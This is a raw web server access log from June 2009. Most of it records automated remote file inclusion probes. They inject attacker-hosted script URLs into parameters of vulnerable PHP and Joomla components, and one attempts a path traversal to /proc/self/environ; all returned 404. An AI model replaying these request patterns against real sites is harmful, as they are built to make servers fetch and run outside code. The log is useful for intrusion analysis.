91.121.112.152 - - [21/Jun/2009:08:41:04 -0400] "GET //index.php?pagina=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
91.121.112.152 - - [21/Jun/2009:08:41:05 -0400] "GET /logs//index.php?pagina=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
83.103.72.130 - - [21/Jun/2009:08:41:59 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:41:59 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:42:01 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:42:59 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:42:59 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:42:59 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:43:30 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:43:58 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:43:58 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:43:58 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:43:59 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:43:59 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:43:59 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:01 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:01 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:01 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:01 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:01 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:01 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:03 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:03 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:03 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:03 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:03 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:04 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:05 -0400] "GET /logs/access_log.Q109061000%20%20//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:05 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:06 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:06 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:06 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:06 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:12 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:13 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:14 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:14 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:14 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:16 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:17 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:17 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:17 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:17 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:17 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:17 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:18 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:18 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:18 -0400] "GET /logs/error_log.Q109061000%20%20//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:19 -0400] "GET //components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:19 -0400] "GET /logs//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:19 -0400] "GET /logs/access_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:44:20 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:20 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:21 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:44:22 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:23 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:08:44:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.200.195.130 - - [21/Jun/2009:08:44:25 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:26 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:44:28 -0400] "GET /logs/error_log.Q109061000//components/com_fabrik/fabrik_table.class.php?site_path=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:45:01 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:45:12 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:08:45:15 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:08:45:15 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.142.148.142 - - [21/Jun/2009:08:45:15 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:45:23 -0400] "GET //include/bbs.lib.inc.php?site_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:45:23 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:45:24 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:45:31 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:45:32 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:45:32 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:46:06 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:46:06 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:46:06 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:46:10 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:46:10 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:46:10 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.121.112.152 - - [21/Jun/2009:08:46:11 -0400] "GET /logs/access_log.Q109060700//index.php?pagina=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
203.241.231.63 - - [21/Jun/2009:08:46:31 -0400] "GET /logs/com_moofaq/includes/file_includer.php?gzip=0&file=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
203.241.231.63 - - [21/Jun/2009:08:46:31 -0400] "GET /com_moofaq/includes/file_includer.php?gzip=0&file=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
203.241.231.63 - - [21/Jun/2009:08:46:31 -0400] "GET /logs/access_log.Q109061500/com_moofaq/includes/file_includer.php?gzip=0&file=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
66.249.71.14 - - [21/Jun/2009:08:46:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L106D4C469392C50077EF07C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.130 - - [21/Jun/2009:08:47:06 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:47:06 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:08:47:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L106D4C469402E5007BEF07C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.130 - - [21/Jun/2009:08:47:18 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:08:47:18 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L106D4C4693E2050078EF07C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.130 - - [21/Jun/2009:08:47:21 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:47:21 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:47:24 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:47:24 -0400] "GET /logs/access_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:08:47:28 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L106D4C4693B2A5007DEF07C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.130 - - [21/Jun/2009:08:47:33 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:47:35 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:08:47:35 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://admin.bestcominfo.com/c-id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
195.34.78.110 - - [21/Jun/2009:08:47:36 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://admin.bestcominfo.com/c-id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.249.71.14 - - [21/Jun/2009:08:47:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L106D4C469342950077EF07C+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.147.30.80 - - [21/Jun/2009:08:47:46 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:47:49 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.17.99.13 - - [21/Jun/2009:08:47:55 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:08:47:55 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:08:47:56 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:08:47:56 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:08:47:56 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:08:47:56 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
83.103.72.130 - - [21/Jun/2009:08:48:32 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:48:32 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.27.203.107 - - [21/Jun/2009:08:48:33 -0400] "GET /logs/access_log.Q109050700/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:48:34 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.27.203.107 - - [21/Jun/2009:08:48:45 -0400] "GET /logs/error_log.Q109050700/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:08:49:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.103.72.130 - - [21/Jun/2009:08:49:30 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.103.72.130 - - [21/Jun/2009:08:49:30 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.234.201.114 - - [21/Jun/2009:08:49:55 -0400] "GET /admin/classes/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
200.234.201.114 - - [21/Jun/2009:08:49:55 -0400] "GET /logs/access_log.Q109050700/admin/classes/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
216.17.99.13 - - [21/Jun/2009:08:49:56 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:08:49:56 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
